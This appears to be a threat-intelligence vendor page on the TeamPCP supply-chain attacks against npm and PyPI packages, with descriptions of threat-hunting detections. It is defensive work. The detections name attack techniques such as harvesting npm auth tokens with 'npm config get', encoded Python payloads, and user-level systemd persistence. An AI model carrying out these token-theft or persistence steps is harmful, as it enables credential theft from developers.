Emerging Threats//
Handala Threat Group
An Iranian aligned threat group conducting destructive and espionage focused cyber operations against organizations in Israel and Western countries.
Threat Overview - TeamPCP Supply Chain Attacks
The TeamPCP supply chain compromise has recently emerged as a highly impactful campaign targeting widely used open-source ecosystems, specifically abusing trust in package repositories such as npm and PyPI. This activity has been linked to compromises involving popular developer tooling and libraries, including Trivy, LiteLLM, and Checkmarx KICS, where malicious code was introduced into legitimate packages and distributed downstream to unsuspecting users. Researchers observed that TeamPCP leveraged these trusted packages to execute malicious payloads during installation or runtime, effectively turning legitimate software into a delivery mechanism for credential theft and environment compromise. It is worthy to note that the compromise of LiteLLM in PyPI and Trivy-related npm packages significantly increased the potential blast radius due to their widespread adoption across cloud-native, DevOps, and AI-driven environments
Verity471 References:
- SITREP 26.1: TeamPCP threat group conducts supply chain attack via Trivy vulnerability scanner
- SITREP 26.2: TeamPCP threat group conducts supply chain attack via Trivy vulnerability scanner
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
TeamPCP Hunt Collection
Related Hunt Packages
Suspicious NPM Auth Token Retrieval via Encoded Python
Captures the execution of high-entropy, encoded payloads (e.g., Base64) within Python command lines to identify fileless malware, obfuscated scripts, and evasion techniques like homoglyph bypasses.
User Context systemctl Invocation by Node.js - Suspicious Service Activity
This hunt aims to surface cases where a node process invokes systemctl --user, which can indicate the creation or management of user-level systemd services for persistence. Attackers have abused this technique in supply chain attacks, such as CanisterWorm, to install backdoors that automatically restart and blend in with legitimate services by using trusted-sounding names like pgmon.
Usage of chmod to Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
Suspicious NPM Auth Token Retrieval via npm config get
This hunt package identifies retrieval of the npm registry authentication token using "npm config get", which may indicate credential access or token harvesting activity.
Python Executing from Non-Standard Directory
This Threat Hunt package identifies suspicious Python executions originating from non-standard directories, such as hidden or unconventional locations signaling potential malware infection.